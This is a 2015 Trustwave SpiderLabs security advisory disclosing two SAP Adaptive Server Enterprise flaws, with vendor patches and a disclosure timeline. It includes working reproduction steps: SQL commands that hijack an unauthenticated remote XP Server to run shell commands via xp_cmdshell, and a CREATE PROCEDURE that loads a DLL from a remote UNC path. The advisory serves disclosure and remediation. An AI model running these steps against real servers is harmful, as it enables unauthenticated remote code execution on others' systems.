Trustwave SpiderLabs Security Advisory TWSL2015-015: Multiple Vulnerabilities in SAP Adaptive Server Enterprise Published: 07/17/2015 Version: 1.0 Vendor: SAP (www.sap.com) Product: SAP Adaptive Server Enterprise (ASE) Version affected: 15.5, 15.7, 16.0 Product description: Relational database management system for UNIX, Linux, and Microsoft Windows platforms. Finding 1: SAP ASE on UNIX/Linux XP Server unauthenticated access vulnerability Credit: Martin Rakhmanov of Trustwave SAP Adaptive Server Enterprise allows unauthenticated connections to the XP Server. This means anyone with a network connection to the XP Server can execute extended stored procedures, including system-provided like xp_cmdshell. That in turn means arbitrary code execution in the XP Server process context. Below are step-by-step instructions how to reproduce this issue against remote XP Server (prerequisite for this is the XP Server running on a remote host) On attacker-controlled SAP ASE installation modify the interfaces file to have an entry that points to the remote XP Server which will be attacked: [REMOTE_XP] master=NLWNSCK,REMOTE,5002 query=NLWNSCK,REMOTE,5002 Login to attacker-controlled SAP ASE using 'sa' account and run: -- start local XP Server to make local database happy xp_cmdshell '-' go -- replace local XP Server with remote one sp_dropserver LOCAL_XP go sp_addserver LOCAL_XP, RPCServer, REMOTE_XP go -- Allow anyone run xp_cmdshell sp_configure 'xp_cmdshell context', 0 go sp_configure 'xp_cmdshell context', 1 go sp_configure 'xp_cmdshell context', 0 go Reconnect and run: -- This will produce a file on the remote XP Server host xp_cmdshell 'id > ~/id.log' go Examine remote XP Server filesystem for the id.log file presence. Finding 2: SAP ASE on UNIX/Linux arbitrary code execution via CREATE PROCEDURE Credit: Martin Rakhmanov of Trustwave CREATE PROCEDURE privilege allows users to create wrappers around native code placed in libraries accessible to the server. This poses a risk because any user granted CREATE PROCEDURE can execute arbitrary code in XP Server's process context by wrapping existing libraries into stored procedures. This creates an extended stored procedure bypassing sp_addextendedproc which requires elevated privileges (sa_role). Additionally, users granted CREATE PROCEDURE can do this in user databases overriding system ESPs. Database owners can run CREATE PROCEDURE as well. -- This will load kernel32 library from remote host and execute DebugBreak in it CREATE PROCEDURE DebugBreak AS EXTERNAL NAME "\\SERVER\PATH\kernel32.dll" go -- Attach a debugger to XP Server process to observe the break DebugBreak go The above code can be executed as user granted CREATE PROCEDURE privilege or database owner and will load and run native code from remote box in the XP Server process context (Windows-specific because of the UNC path). Remediation Steps: Apply one of these following vendor supplied patches: SAP ASE 15.7 SP135 SAP ASE Cluster Edition 15.7 SP135 SAP ASE 16.0 SP01 PL02 Revision History: 03/31/2015 - Finding #1 (SecMsg ID 77045 2015) disclosed to vendor 03/31/2015 - Finding #2 (SecMsg ID 77183 2015) disclosed to vendor 07/14/2015 - Patch released by vendor 07/17/2015 - Advisory published About Trustwave: Trustwave helps businesses fight cybercrime, protect data and reduce security risks. With cloud and managed security services, integrated technologies and a team of security experts, ethical hackers and researchers, Trustwave enables businesses to transform the way they manage their information security and compliance programs while safely embracing business imperatives including big data, BYOD and social media. More than 2.5 million businesses are enrolled in the Trustwave TrustKeeper® cloud platform, through which Trustwave delivers automated, efficient and cost-effective data protection, risk management and threat intelligence. Trustwave is a privately held company, headquartered in Chicago, with customers in 96 countries. For more information about Trustwave, visit www.trustwave.com. About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.